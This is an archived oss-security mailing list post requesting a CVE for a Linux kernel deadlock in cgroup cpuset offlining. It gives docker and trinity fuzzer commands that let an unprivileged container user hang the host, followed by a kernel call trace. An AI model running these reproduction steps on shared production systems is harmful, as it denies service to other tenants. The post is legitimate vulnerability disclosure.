Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 4 Nov 2016 14:17:29 -0400 (EDT)
From: CAI Qian <caiqian@...hat.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: linux kernel - local DoS with cgroup offline code

A malicious user who can run an arbitrary image with a non-privileged user
in a Container-as-a-service cloud environment could use the exploit to
deadlock the container nodes to deny the service for other users.

This is confirmed to affect the latest mainline kernel (4.9-rc3) using this
kernel config, http://people.redhat.com/qcai/tmp/config-god-4.9rc2
and as old as v3.17. RHEL 7.3 kernel is not affected.

# docker run -it caiqian/rhel-tools bash
container> # su - test
container> $ ulimit -c 0
container> $ trinity -D --disable-fds=memfd --disable-fds=timerfd \
             --disable-fds=pipes --disable-fds=testfile \
             --disable-fds=sockets --disable-fds=perf \
             --disable-fds=epoll --disable-fds=eventfd \
             --disable-fds=drm

After 30-minute, interrupt (Ctrl-C) all the trinity processes, and then,

container> $ exit
container> # exit
# systemctl status docker
<hang...>
# systemctl reboot
Failed to start reboot.target: Connection timed out
See system logs and 'systemctl status reboot.target' for details.

After a while, lots of hang tasks on the console,
[ 5535.893675] INFO: lockdep is turned off.
[ 5535.898085] INFO: task kworker/45:4:146035 blocked for more than 120
seconds.
[ 5535.906059]       Tainted: G        W       4.8.0-rc8-fornext+ #1
[ 5535.912865] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables
this message.
[ 5535.921613] kworker/45:4    D ffff880853e9b950 14048 146035      2
0x00000080
[ 5535.929630] Workqueue: cgroup_destroy css_killed_work_fn
[ 5535.935582]  ffff880853e9b950 0000000000000000 0000000000000000
ffff88086c6da000
[ 5535.943882]  ffff88086c9e2000 ffff880853e9c000 ffff880853e9baa0
ffff88086c9e2000
[ 5535.952205]  ffff880853e9ba98 0000000000000001 ffff880853e9b968
ffffffff817cdaaf
[ 5535.960522] Call Trace:
[ 5535.963265]  [<ffffffff817cdaaf>] schedule+0x3f/0xa0
[ 5535.968817]  [<ffffffff817d33fb>] schedule_timeout+0x3db/0x6f0
[ 5535.975346]  [<ffffffff817cf055>] ? wait_for_completion+0x45/0x130
[ 5535.982256]  [<ffffffff817cf0d3>] wait_for_completion+0xc3/0x130
[ 5535.988972]  [<ffffffff810d1fd0>] ? wake_up_q+0x80/0x80
[ 5535.994804]  [<ffffffff8130de64>] drop_sysctl_table+0xc4/0xe0
[ 5536.001227]  [<ffffffff8130de17>] drop_sysctl_table+0x77/0xe0
[ 5536.007648]  [<ffffffff8130decd>] unregister_sysctl_table+0x4d/0xa0
[ 5536.014654]  [<ffffffff8130deff>] unregister_sysctl_table+0x7f/0xa0
[ 5536.021657]  [<ffffffff810f57f5>]
unregister_sched_domain_sysctl+0x15/0x40
[ 5536.029344]  [<ffffffff810d7704>] partition_sched_domains+0x44/0x450
[ 5536.036447]  [<ffffffff817d0761>] ? __mutex_unlock_slowpath+0x111/0x1f0
[ 5536.043844]  [<ffffffff81167684>] rebuild_sched_domains_locked+0x64/0xb0
[ 5536.051336]  [<ffffffff8116789d>] update_flag+0x11d/0x210
[ 5536.057373]  [<ffffffff817cf61f>] ? mutex_lock_nested+0x2df/0x450
[ 5536.064186]  [<ffffffff81167acb>] ? cpuset_css_offline+0x1b/0x60
[ 5536.070899]  [<ffffffff810fce3d>] ? trace_hardirqs_on+0xd/0x10
[ 5536.077420]  [<ffffffff817cf61f>] ? mutex_lock_nested+0x2df/0x450
[ 5536.084234]  [<ffffffff8115a9f5>] ? css_killed_work_fn+0x25/0x220
[ 5536.091049]  [<ffffffff81167ae5>] cpuset_css_offline+0x35/0x60
[ 5536.097571]  [<ffffffff8115aa2c>] css_killed_work_fn+0x5c/0x220
[ 5536.104207]  [<ffffffff810bc83f>] process_one_work+0x1df/0x710
[ 5536.110736]  [<ffffffff810bc7c0>] ? process_one_work+0x160/0x710
[ 5536.117461]  [<ffffffff810bce9b>] worker_thread+0x12b/0x4a0
[ 5536.123697]  [<ffffffff810bcd70>] ? process_one_work+0x710/0x710
[ 5536.130426]  [<ffffffff810c3f7e>] kthread+0xfe/0x120
[ 5536.135991]  [<ffffffff817d4baf>] ret_from_fork+0x1f/0x40
[ 5536.142041]  [<ffffffff810c3e80>] ? kthread_create_on_node+0x230/0x230

Below is the full trace on ext4 (xfs also affected) and the sysrq-w report.
http://people.redhat.com/qcai/tmp/dmesg-ext4-cgroup-hang

This has already been reported to cgroup maintainers a few weeks ago, and
one of them mentioned that "cgroup is trying to offline a cpuset css, which
takes place under cgroup_mutex.  The offlining ends up trying to drain
active usages of a sysctl table which apprently is not happening." There is
no fix at this time as far as I can tell.
     CAI Qian

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ